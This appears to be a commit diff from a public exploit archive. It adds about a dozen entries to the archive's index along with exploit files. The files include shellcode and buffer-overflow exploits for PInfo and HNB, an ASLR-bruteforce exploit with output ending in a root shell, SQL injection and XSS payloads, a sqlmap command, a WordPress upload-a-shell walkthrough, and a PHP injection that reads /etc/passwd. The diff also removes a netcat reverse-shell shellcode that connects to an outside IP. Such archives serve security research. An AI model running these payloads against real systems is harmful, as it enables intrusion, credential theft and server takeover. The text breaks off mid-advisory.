DB: 2016-06-28

14 new exploits

Linux Netcat Reverse Shell - 32bit - 77 bytes

XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS Vulnerability

Linux x86_64 execve Shellcode - 15 bytes
WordPress Ultimate Product Catalog Plugin 3.8.6 - Arbitrary File Upload
OPAC KpwinSQL - SQL Injection
Magnet Networks Tesley CPVA 642 Router – Weak WPA-PSK Passphrase Algorithm
Option CloudGate CG0192-11897 - Multiple Vulnerabilities
Kagao 3.0 - Multiple Vulnerabilities
Panda Security Multiple Products - Privilege Escalation
MyLittleForum 2.3.5 - PHP Command Injection
iBilling 3.7.0 - Stored and Reflected XSS
PInfo 0.6.9-5.1 - Local Buffer Overflow
BigTree CMS 4.2.11 - SQL Injection
HNB 1.9.18-10 - Local Buffer Overflow
Linux x86 /bin/sh Shellcode + ASLR Bruteforce
SugarCRM 6.5.18 - PHP Code Injection
Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2016-06-28 05:03:46 +00:00
parent 3739831fb2
commit e9145685e4
17 changed files with 1450 additions and 170 deletions

View file

@ -30635,7 +30635,6 @@ id,file,description,date,author,platform,type,port
34005,platforms/php/webapps/34005.txt,"Percha Downloads Attach 1.1 Component for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34006,platforms/php/webapps/34006.txt,"Percha Gallery Component 1.6 Beta for Joomla! index.php controller Parameter Traversal Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34007,platforms/php/webapps/34007.txt,"Dolibarr CMS 3.5.3 - Multiple Security Vulnerabilities",2014-07-08,"Deepak Rathore",php,webapps,0
40007,platforms/lin_x86/shellcode/40007.c,"Linux Netcat Reverse Shell - 32bit - 77 bytes",2016-06-23,CripSlick,lin_x86,shellcode,0
34008,platforms/php/webapps/34008.txt,"Percha Multicategory Article Component 0.6 for Joomla! index.php controller Parameter Arbitrary File Access",2010-05-19,AntiSecurity,php,webapps,0
34009,platforms/windows/remote/34009.rb,"Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow",2014-07-08,metasploit,windows,remote,20010
34010,platforms/win32/dos/34010.html,"Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption PoC (MS14-035)",2014-07-08,"Drozdova Liudmila",win32,dos,0
@ -35694,7 +35693,7 @@ id,file,description,date,author,platform,type,port
39467,platforms/multiple/dos/39467.txt,"Adobe Flash - BitmapData.drawWithQuality Heap Overflow",2016-02-17,"Google Security Research",multiple,dos,0
39468,platforms/php/webapps/39468.txt,"Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0
39469,platforms/php/webapps/39469.txt,"DirectAdmin 1.491 - CSRF Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0
39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS Vulnerability",2016-02-19,"Pawan Dxb",windows,dos,0
39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS Vulnerability",2016-02-19,"Pawan Lal",windows,dos,0
39471,platforms/windows/dos/39471.txt,"STIMS Buffer 1.1.20 - Buffer Overflow SEH (DoS)",2016-02-19,"Shantanu Khandelwal",windows,dos,0
39472,platforms/windows/dos/39472.txt,"STIMS Cutter 1.1.3.20 - Buffer Overflow DoS",2016-02-19,"Shantanu Khandelwal",windows,dos,0
39473,platforms/php/webapps/39473.txt,"Chamilo LMS IDOR - (messageId) Delete POST Inject Vulnerability",2016-02-19,Vulnerability-Lab,php,webapps,0
@ -36159,7 +36158,6 @@ id,file,description,date,author,platform,type,port
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
39975,platforms/lin_x86-64/shellcode/39975.c,"Linux x86_64 execve Shellcode - 15 bytes",2016-06-20,CripSlick,lin_x86-64,shellcode,0
39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80
39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80
39978,platforms/php/webapps/39978.php,"Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,php,webapps,80
@ -36190,3 +36188,17 @@ id,file,description,date,author,platform,type,port
40009,platforms/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,php,webapps,80
40010,platforms/php/webapps/40010.html,"XuezhuLi FileSharing - (Add User) CSRF",2016-06-23,HaHwul,php,webapps,80
40011,platforms/php/webapps/40011.txt,"FinderView - Multiple Vulnerabilities",2016-06-23,HaHwul,php,webapps,80
40012,platforms/php/webapps/40012.txt,"WordPress Ultimate Product Catalog Plugin 3.8.6 - Arbitrary File Upload",2016-06-27,"i0akiN SEC-LABORATORY",php,webapps,80
40013,platforms/php/webapps/40013.txt,"OPAC KpwinSQL - SQL Injection",2016-06-27,bRpsd,php,webapps,80
40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0
40016,platforms/hardware/webapps/40016.txt,"Option CloudGate CG0192-11897 - Multiple Vulnerabilities",2016-06-27,LiquidWorm,hardware,webapps,80
40019,platforms/php/webapps/40019.txt,"Kagao 3.0 - Multiple Vulnerabilities",2016-06-27,N4TuraL,php,webapps,80
40020,platforms/windows/local/40020.txt,"Panda Security Multiple Products - Privilege Escalation",2016-06-27,Security-Assessment.com,windows,local,0
40021,platforms/php/webapps/40021.php,"MyLittleForum 2.3.5 - PHP Command Injection",2016-06-27,hyp3rlinx,php,webapps,80
40022,platforms/php/webapps/40022.txt,"iBilling 3.7.0 - Stored and Reflected XSS",2016-06-27,"Bikramaditya Guha",php,webapps,80
40023,platforms/linux/local/40023.py,"PInfo 0.6.9-5.1 - Local Buffer Overflow",2016-06-27,"Juan Sacco",linux,local,0
40024,platforms/php/webapps/40024.txt,"BigTree CMS 4.2.11 - SQL Injection",2016-06-27,"Mehmet Ince",php,webapps,80
40025,platforms/linux/local/40025.py,"HNB 1.9.18-10 - Local Buffer Overflow",2016-06-27,"Juan Sacco",linux,local,0
40026,platforms/lin_x86/shellcode/40026.txt,"Linux x86 /bin/sh Shellcode + ASLR Bruteforce",2016-06-27,"Pawan Lal",lin_x86,shellcode,0
40027,platforms/php/webapps/40027.txt,"SugarCRM 6.5.18 - PHP Code Injection",2016-06-27,"Egidio Romano",php,webapps,80
40028,platforms/php/webapps/40028.txt,"Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities",2016-06-27,Security-Assessment.com,php,webapps,443

Can't render this file because it is too large.

View file

@ -0,0 +1,34 @@
# Exploit Title: Magnet Networks Weak WPA-PSK passphrases used in Tesley CPVA 642 Router
# Google Dork:
# Date: 01/06/2016
# Author: Matt O'Connor
# Advisory Link: https://www.rgb.ie/magnet-broadband-weak-wpa-psk-algorithm.pdf
# Version:
# Category: Remote
# Tested on: Magnet Networks Tesley CPVA 642
The Tesley CPVA 642 routers supplied by Magnet Networks are vulnerable to an offline dictionary attack if the WPA-PSK handshake is obtained by an attacker.
The WPA-PSK pass phrase has the following features:
• Starts with MAGNET0
• Adds six random numerical digits
• 1 million possible combinations ( MAGNET0000000 MAGNET0999999 )
The entire keyspace can be generated using “mask processor” by ATOM, piping each letter out to its own file, for example:
./mp32 MAGNET0?1?1?1?1?1?1 > magnet_networks_tesley_ks.txt
The .txt file weighs in at around 45mb.
Using a 1.4ghz i3 processor on a budget laptop, we were hitting 1,000 keys per second. Breakdown below:
• 1,000,000 / 1,000 keys per second = 1,000 seconds
• 1,000 / 60 seconds = 16~ minutes
The WPA-PSK handshake we used has the password MAGNET0349325 and was cracked within ~6 minutes.
If youre using the default password on your Magnet Networks Tesley CPVA 642 Router, we recommend changing it immediately to a more secure password, using a mix of letters, numbers and symbols.
On the 20th of June 2016, Magnet Networks Customer Care confirmed via email that these routers are not used by Magnet Networks anymore.

View file

@ -0,0 +1,59 @@

Option CloudGate Insecure Direct Object References Authorization Bypass
Vendor: Option NV
Product web page: http://www.option.com
Affected version: CG0192-11897
Summary: The CloudGate M2M gateway from Option provides competitively
priced LAN to WWAN routing and GPS functionality in a single basic unit
certified on all major us cellular operators (CDMA/EV-DO and WCDMA/HSPA+).
The CloudGate is simple to configure locally or remotely from your PC,
tablet or Smartphone.
Desc: Insecure Direct Object References occur when an application provides
direct access to objects based on user-supplied input. As a result of this
vulnerability attackers can bypass authorization and access resources and
functionalities in the system directly, for example APIs, files, upload
utilities, device settings, etc.
Tested on: lighttpd 1.4.39
firmware 2.62.4
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5333
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5333.php
11.06.2016
--
GET /partials/firewall.html
GET /partials/system.html
GET /partials/ipsec.html
GET /partials/provisioning.html
GET /api/login
GET /api/replacementui
GET /api/goatgates
OR
/#/firewall
/#/system
/#/ipsec
/#/provisioning
XSS:
http://127.0.0.2/api/replacementui<script>alert(1)</script>
http://127.0.0.2/api/goatgates<script>alert(2)</script>
http://127.0.0.2/api/Blah-Blah<script>alert(3)</script>
http://127.0.0.2/api/<script>alert(4)</script>

View file

@ -1,48 +0,0 @@
#include<stdio.h>
#include<string.h>
// OS-20614
// eben_s_dowling@georgiasouthern.edu
/*
global _start
_start:
execve:
mov rsi, rax
mov rdx, rsi
mov r12 , 0x68732f6e69622f
push r12
push rsp
pop rdi
mov al, 0x3b
syscall
*/
unsigned char code[] = \
"\x48\x89\xc6" // mov %rax,%rsi
"\x48\x89\xf2" // mov %rsi,%rdx
"\x49\xbc\x2f\x62\x69\x6e\x2f" // movabs $0x68732f6e69622f,%r12
"\x73\x68\x00"
"\x41\x54" // push %r12
"\x54" // push %rsp
"\x5f" // pop %rdi
"\xb0\x3b" // mov $0x3b,%al
"\x0f\x05" // syscall
;
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

View file

@ -1,119 +0,0 @@
#include <stdio.h>
#include <string.h>
//eben_s_dowling@georgiasouthern.edu
//OffSec ID: OS-20614
/*
global _start
_start:
;/bin//nc -e///bin/sh 10.0.0.6 99
xor eax,eax ; clear eax
xor edx,edx ; clear edi
; 0xIN-LAST IN-FIRST
push 0x39393939
mov esi, esp ; port in 4 hex bytes
push eax ; push null ------------
jmp short ipADDR
continue:
pop edi ; ipADDR
push eax ; push null ------------
push 0x68732F6E
push 0x69622F2F ; //bin/sh
push 0x2F2F652D ; -e//
mov ecx, esp
push eax ; push null ------------
push 0x636e2f2f ;
push 0x6e69622f ; push /bin
mov ebx, esp ; mov /bin//nc
push eax ; push null -----------
;--------------FIRST PUSH FINISHED------------------------
push esi ; push port
push edi ; push ipADDR
push ecx ; push -e////bin/sh
push ebx ; push /bin//nc
;--------------SECOND PUSH FINISHED------------------------
xor ecx, ecx
xor edx, edx
;--------------REGISTERS CLEARED FOR EXECVE----------------
mov ecx,esp ; mov /bin//nc > ecx ecx = long pointer
mov al,0x0b ; execve syscall
int 0x80 ; syscall
ipADDR:
call continue
db "10.0.0.6"
*/
#define PORT "\x39\x39\x39\x39" //port = 9999
/*To keep this shellcode at 52 bytes,
limit the port to 4 bytes*/
#define ipADDR "\x31\x30\x2e\x30\x2e\x30\x2e\x36" //IP = 10.0.0.6
//Both the IP & PORT are converted from ascii to hex
unsigned char shellcode[] =
// <_start>
"\x31\xc0" // xor %eax,%eax
"\x31\xd2" // xor %edx,%edx
"\x68"PORT // push $0x39393939
"\x89\xe6" // mov %esp,%esi
"\x50" // push %eax
"\xeb\x2f" // jmp 804809d <ipADDR>
// <continue>
"\x5f" // pop %edi
"\x50" // push %eax
"\x68\x6e\x2f\x73\x68" // push $0x68732f6e
"\x68\x2f\x2f\x62\x69" // push $0x69622f2f
"\x68\x2d\x65\x2f\x2f" // push $0x2f2f652d
"\x89\xe1" // mov %esp,%ecx
"\x50" // push %eax
"\x68\x2f\x2f\x6e\x63" // push $0x636e2f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp,%ebx
"\x50" // push %eax
"\x56" // push %esi
"\x57" // push %edi
"\x51" // push %ecx
"\x53" // push %ebx
"\x31\xc9" // xor %ecx,%ecx
"\x31\xd2" // xor %edx,%edx
"\x89\xe1" // mov %esp,%ecx
"\xb0\x0b" // mov $0xb,%al
"\xcd\x80" // int $0x80
// <ipADDR>
"\xe8\xcc\xff\xff\xff" // call 804806e <continue>
ipADDR
;
int main(void)
{
printf("Shellcode length: %d\n", strlen(shellcode));
(*(void(*)(void))shellcode)();
return 0;
}

View file

@ -0,0 +1,125 @@
/bin/sh shellcode Ubuntu 14.0.4 32 bit + ASLR Bruteforce
#shellcodeandaslrbruteforce.c
#Tested on : Ubuntu 14.04 32 bits
#Author : Pawan Lal dxb.pawan@gmail.com
*vim shellcodeandaslrbruteforce.c*
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <string.h>
void vuln (const char* arg){
char buffer[100];
strcpy(buffer, arg);
printf("Hello %s\n", buffer);
printf("[+] buffer @ %p\n", buffer);
}
int main (int argc, char **argv){
if (argc != 2) {
printf("Usage: %s <buffer>\n", argv[0]);
exit(1);
}
vuln(argv[1]);
return 0;
}
Makefile with below command
usage : gcc -fno-stack-protector -z execstack shellcodeandaslrbruteforce.c -o shellcodeandaslrbruteforce
Turn On ASLR:
echo 1 | sudo tee /proc/sys/kernel/randomize_va_space
#############################################################
*shellcode that executes '/bin/sh'*
global _start
section .text
_start:
xor eax, eax
push eax
push 0x68732f2f ;//sh
push 0x6e69622f ;/bin
mov ebx, esp ;moving the pointer to "/bin//sh" to ebx
push eax ;push 0 (=eax)
mov edx, esp ;moving 0 to edx
push ebx
mov ecx, esp ;moving the pointer to "/bin//sh" to ecx
mov al, 11
int 0x80 ;execv syscall
################################################################
*Final exploit using /bin/sh shellcode and ASLR bruteforce*
*vim shellcodeandaslrbruteforce.py*
#!/usr/bin/python
import struct, sys, time
from subprocess import PIPE, Popen
# exec /bin/sh
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
bufsize = 100
offset = 12 #incl. saved ebp
nopsize = 4096
def prep_buffer(addr_buffer):
buf = "A" * (bufsize+offset)
buf += struct.pack("<I",(addr_buffer+bufsize+offset+4))
buf += "\x90" * nopsize
buf += shellcode
return buf
def brute_aslr(buf):
p = Popen(['./bof', buf]).wait()
if __name__ == '__main__':
addr_buffer = 0xbf92b39c # randomly decided
buf = prep_buffer(addr_buffer)
i = 0
while True:
print i
brute_aslr(buf)
i += 1
##################################################################
root@ubuntu:~/bof/shellcodeandaslrbruteforce
⇒ python shellcodeandaslrbruteforce.py
(...)
(...)
[+] buffer @ 0xbfc2bc0c
996
(... snippet)
[+] buffer @ 0xbfb9930c
997
(... snippet)
[+] buffer @ 0xbf92721c
998
(... snippet)
[+] buffer @ 0xbf92a26c
# whoami
root

73
platforms/linux/local/40023.py Executable file
View file

@ -0,0 +1,73 @@
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: PInfo - File viewer
# Version: 0.6.9-5.1
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: An alternative info-file viewer
# pinfo is an viewer for Info documents, which is based on ncurses.
# Kali Linux 2.0 package: pool/main/p/pinfo/pinfo_0.6.9-5.1_i386.deb
# MD5sum: 9487efb0be037536eeda31b588cb6f89
# Website:http://pinfo.alioth.debian.org/
#
# $ run -m `python -c 'print "A"*564+"DCBA"'`
# Program received signal SIGSEGV, Segmentation fault.
# --------------------------------------------------------------------------[regs]
# EAX: 0x00000002 EBX: 0xB7F0B000 ECX: 0x00004554 EDX: 0x00000100
# o d I t s z a P c
# ESI: 0x41424344 EDI: 0x00004554 EBP: 0xBFFFF4A4 ESP: 0xBFFFEF30
# EIP: 0xB7D92832
# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
# --------------------------------------------------------------------------[code]
# => 0xb7d92832 <__GI_getenv+114>: cmp di,WORD PTR [esi]
# 0xb7d92835 <__GI_getenv+117>: jne 0xb7d92828 <__GI_getenv+104>
# 0xb7d92837 <__GI_getenv+119>: mov eax,DWORD PTR [esp+0x14]
# 0xb7d9283b <__GI_getenv+123>: mov DWORD PTR [esp+0x8],eax
# 0xb7d9283f <__GI_getenv+127>: mov eax,DWORD PTR [esp+0x18]
# 0xb7d92843 <__GI_getenv+131>: mov DWORD PTR [esp+0x4],eax
# 0xb7d92847 <__GI_getenv+135>: lea eax,[esi+0x2]
# 0xb7d9284a <__GI_getenv+138>: mov DWORD PTR [esp],eax
# --------------------------------------------------------------------------------
#
# gdb$ x/100x $esp
# 0xbffff250: 0xbffff49c 0x00000003 0x00000001 0x00000002
# 0xbffff260: 0xb7d6ebf8 0xb7fe78bd 0xb7d74ffd 0x41049384
# 0xbffff270: 0x41414141 0x41414141 0x41414141 0x41414141
# 0xbffff280: 0x41414141 0x41414141 0x41414141 0x41414141
# 0xbffff290: 0x41414141 0x41414141 0x41414141 0x41414141
# 0xbffff2a0: 0x41414141 0x41414141 0x41414141 0x41414141
# 0xbffff2b0: 0x41414141 0x41414141 0x41414141 0x41414141
import os, subprocess
def run():
try:
print "# PInfo File Viewer - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack"
# NOPSLED + SHELLCODE + EIP
buffersize = 564
nopsled = "\x90"*200
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x40\xf3\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["pinfo -m",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, PInfo File Viewer - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit PInfo 0.6.9-5.1 Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()

65
platforms/linux/local/40025.py Executable file
View file

@ -0,0 +1,65 @@
# Exploit developed using Exploit Pack v5.4
# Exploit Author: Juan Sacco - http://www.exploitpack.com - jsacco@exploitpack.com
# Program affected: HNB - Organizer
# Version: 1.9.18-10
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: Hnb is an ncurses program to organize many
kinds of data in one place, for
# example addresses, todo lists, ideas, book reviews or to store snippets of
# brainstorming.
# Kali Linux 2.0 package: pool/main/h/hnb/hnb_1.9.18-10_i386.deb
# MD5sum: 1e1ff680f6e94a1a28ca85eeb3ea6aa0
# Website:http://hnb.sourceforge.net/
#
# gdb$ run -rc `python -c 'print "A"*108'`
# Starting program: /usr/bin/hnb -rc `python -c 'print "A"*108'`
# *** buffer overflow detected ***: /usr/bin/hnb terminated
# ======= Backtrace: =========
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c773)[0xb7e14773]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__fortify_fail+0x45)[0xb7ea4b85]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(+0xfac3a)[0xb7ea2c3a]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7ea2127]
# /usr/bin/hnb[0x8049669]
# /lib/i386-linux-gnu/i686/cmov/libc.so.6(__libc_start_main+0xf3)[0xb7dc1a63]
# /usr/bin/hnb[0x804a2d9]
# ======= Memory map: ========
# 08048000-0806e000 r-xp 00000000 08:01 2253992 /usr/bin/hnb
# 0806e000-0806f000 r--p 00025000 08:01 2253992 /usr/bin/hnb
# 0806f000-08070000 rw-p 00026000 08:01 2253992 /usr/bin/hnb
# 08070000-080b1000 rw-p 00000000 00:00 0 [heap]
import os, subprocess
def run():
try:
print "# HNB Organizer - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack"
# NOPSLED + SHELLCODE + EIP
buffersize = 108
nopsled = "\x90"*40
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x40\xf3\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["hnb -rc",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, HNB File Viewer - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit HNB 1.9.18-10 Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()

78
platforms/php/webapps/40012.txt Executable file
View file

@ -0,0 +1,78 @@
# Exploit Title: Wordpress Ultimate-Product-Catalog v3.8.6 Arbitrary file (RCE)
# Date: 2016-06-23
# Google Dork: Index of /wp-content/plugins/ultimate-product-catalogue/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://www.EtoileWebDesign.com/
# plugin uri: http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/
# Version: 3.8.6
# Tested on: windows 7 + Mozilla firefox.
# Demo: https://youtu.be/FSRZlD3SVQc
====================
DESCRIPTION
====================
An arbitrary file upload web vulnerability has been detected in the WordPress Ultimate Product Catalogue Plugin v3.8.6 and below.
The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory if the plugin is premium version and the remote
attacker have an especific account (contributor|editor|author|administrator) who can manage this plugin.
===================
STEPS TO REPRODUCE
===================
1.- Go to "Custom fields" tab and add a new custom field with "type" file.
2.- Go to "Products" tab, Now you can see a new field with that you added previously.
3.- Select your php shell and save the product.
4.- Go to uri "http(s)://<wp-host>/<wp-path>/wp-content/uploads/upcp-product-file-uploads/<your-shell-name>" and enjoy.
================
Vulnerable code
================
located in <upc-plugin-path>/Functions/Update_Admin-Databases.php` file, the function `UPCP_Handle_File_Upload` does not check for file extensions.
function UPCP_Handle_File_Upload($Field_Name) {
..
if (!is_user_logged_in()) {exit();}
/* Make sure that the file exists */
elseif (empty($_FILES[$Field_Name]['tmp_name']) || $_FILES[$Field_Name]['tmp_name'] == 'none') {
$error = __('No file was uploaded here..', 'UPCP');
}
/* Move the file and store the URL to pass it onwards*/
else {
$msg .= $_FILES[$Field_Name]['name'];
//for security reason, we force to remove all uploaded file
$target_path = ABSPATH . 'wp-content/uploads/upcp-product-file-uploads/';
//create the uploads directory if it doesn't exist
if (!file_exists($target_path)) {
mkdir($target_path, 0777, true);
}
$target_path = $target_path . basename( $_FILES[$Field_Name]['name']);
if (!move_uploaded_file($_FILES[$Field_Name]['tmp_name'], $target_path)) {
//if (!$upload = wp_upload_bits($_FILES["Item_Image"]["name"], null, file_get_contents($_FILES["Item_Image"]["tmp_name"]))) {
$error .= "There was an error uploading the file, please try again!";
}
...
}
?>
==========
CREDITS
==========
Vulnerability discovered by:
Joaquin Ramirez Martinez [i0akiN SEC-LABORATORY]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
==========
time-line
==========
2015-08-08: vulnerability found
2016-06-21: Reported to vendor (No response)
2016-06-24: Public disclousure
===================================

31
platforms/php/webapps/40013.txt Executable file
View file

@ -0,0 +1,31 @@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Product -> OPAC KpwinSQL - SQL Injection
Date -> 6/24/2016
Author -> bRpsd
Skype: vegnox
Vendor HomePage -> http://www.kpsys.cz/
Product Download -> http://www.kpsys.cz/kpwinsql/demo.html
Product Version -> / All
SQL Version -> Firebird 1.5.3
OS -> Win98SE, Me, NT, 2000, XP, 2003, Vista
Dork -> intitle:"WWW OPAC KpwinSQL"
Dork2 -> inurl:zaznam.php?detail_num=
Dork3 -> inurl:opacsql2_0
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
File: zanzam.php
Parameter: detail_num
Test > http://localhost:8888/zaznam.php?detail_num=1'
Response:
24-06-2016 08:52:21: localhost: CHYBA: 2 WARNING: ibase_query(): Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 40 :In: "C:\wwwopac\functions.php" (Line: 5462) : URL:"/zaznam.php?detail_num=1%27"Pri zpracovani pozadavku doslo k chybe, omlouvame se ...

88
platforms/php/webapps/40019.txt Executable file
View file

@ -0,0 +1,88 @@
######################
# Application Name : Kagao v3.0 - Professional Classified Market
# Google Dork : inurl:/cat1.php?id2=
# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
# Vendor Homepage : http://kogaoscript.com/
# Vulnerable Type : SQL Injection & Cross Site Scripting
# Date : 2016-06-26
# Tested on : Windows 10 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0.6.28#dev
###################### SQL Injection Vulnerability ######################
# Location :
http://localhost/[path]/cat1.php
######################
# Vulnerable code :
function pagenat(){
$buildLink = array(
"id" => intval($_GET['id']),
"id2" => isset($_GET['id2']) ? intval($_GET['id2']) : '',
"suche" => htmlspecialchars($_GET['suche']),
"sucheWo" => htmlspecialchars($_GET['sucheWo']),
"umkreis" => intval($_GET['umkreis']),
"page" => ""
);
$buildLink = http_build_query($buildLink);
$buildLink = 'cat1.php?' . $buildLink;
if($_GET['id2']){
$pages_num = getZahlPage($_GET['id2'], 'unterkategorie');
}
else{
$pages_num = getZahlPage($_GET['id'], 'kategorie');
}
$page = (isset($_GET['page'])) ? max($_GET['page'], 1) : 1;
$pages = ($pages_num > 1) ? pages($pages_num, $page, $buildLink) : '';
echo $pages;
}
######################
# PoC Exploit:
http://localhost/[path]/cat1.php?id2=999999.9%22%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29--%20a
# Exploit Code via sqlmap:
sqlmap -u http://localhost/[path]/cat1.php?id2=10 --dbms=mysql --random-agent --technique=BUESTQ --dbs --tamper=versionedkeywords --level=3 --risk=3 --no-cast
Parameter: id2 (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id2=10" AND 9863=9863 AND "UvFy"="UvFy
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id2=10" AND SLEEP(5) AND "Zxun"="Zxun
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: id2=-5676" UNION ALL SELECT CONCAT(0x716b786271,0x4e77456d62457a716850544f776d506c7679624969616c6b47417542766c4152464c6a665a7a7064,0x7162767671)-- vvJN
---
###################### Cross Site Scripting Vulnerability ######################
# PoC Exploit:
Search: "><script>alert('n4tural');</script>
http://localhost/[path]/cat1.php?id2=0&pricestart=0&room=&flache=&price=&zulassung=&kilometer=&kraftstoff=&id3=0&suche=%22%3E%3Cscript%3Ealert%28%27n4tural%27%29%3B%3C%2Fscript%3E&id=0&sucheWo=&umkreis=0
######################

225
platforms/php/webapps/40021.php Executable file
View file

@ -0,0 +1,225 @@
/*
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MYLITTLEFORUM-PHP-CMD-EXECUTION.txt
[+] ISR: APPARITIONSEC
Vendor:
=================
mylittleforum.net
Download:
github.com/ilosuna/mylittleforum/releases/tag/v2.3.5
Product:
===================
MyLittleForum 2.3.5
my little forum is a simple PHP and MySQL based internet forum that
displays the messages in classical threaded
view (tree structure). The main claim of this web forum is simplicity.
Furthermore it should be easy to install
and run on a standard server configuration with PHP and MySQL.
Vulnerability Type:
=======================
PHP Command Execution
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
When setting up mylittleforum CMS users will have to walk thru an
installation script and provide details for the application like the
forums email address, name, admin email, admin password, database name
etc...
However, no input validation / checks exists for that installation script.
Low privileged users can then supply arbitrary PHP code for
the Database Name. The PHP command values will get written to the
config/db_settings.php file and processed by the application. Since
we supply an invalid Database Name a MySQL error will be thrown but the
injected PHP payload will also be executed on the host system.
If the CMS is installed by low privileged user and that user has basic
MySQL database authorization to run the install for the CMS it
can result in a privilege escalation, remote command execution and complete
takeover of the host server.
The /config/db_settings.php is protected by .htaccess file but we can write
directly to "db_settings.php" file and execute code directly
from /install/index.php file bypassing any access control provided by the
.htaccess file or we just delete it by adding call to PHP function
@unlink('.htaccess') to our injected PHP payload.
1) Browse to http://localhost/mylittleforum-2.3.5/install/index.php
2) For Database Name input field enter the below PHP code for POC.
';?><?php echo passthru('/bin/cat /etc/passwd');'
This results in config/db_settings.php file being injected with our
arbitrary PHP code.
$db_settings['database'] = '';?><?php echo passthru('/bin/cat
/etc/passwd');'';
3) Make another HTTP GET request to same page "/install/index.php" file and
